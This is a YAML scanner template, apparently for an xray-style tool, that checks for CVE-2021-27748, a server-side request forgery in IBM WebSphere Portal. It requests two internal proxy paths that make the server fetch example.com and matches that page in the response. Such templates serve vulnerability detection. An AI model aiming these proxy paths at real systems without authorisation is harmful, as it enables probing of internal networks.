name: yaml-poc-ibm-websphere_application_server-ssrf-CVE-2021-27748
binding: 59a7d779-5e35-4eab-99ef-884703d980bd
detail:
    author: system_user
    links:
        - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
    vulnerability:
        id: 40f93aaa-36e2-4ccc-b31b-24d0ef4fff28
        level: high
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /docpicker/internal_proxy/http/example.com
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b"<title>Example Domain</title>") && response.body.bcontains(b"<h1>Example Domain</h1>")
    r1:
        request:
            cache: true
            method: GET
            path: /wps/PA_WCM_Authoring_UI/proxy/http/example.com
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b"<title>Example Domain</title>") && response.body.bcontains(b"<h1>Example Domain</h1>")
expression: r0() || r1()
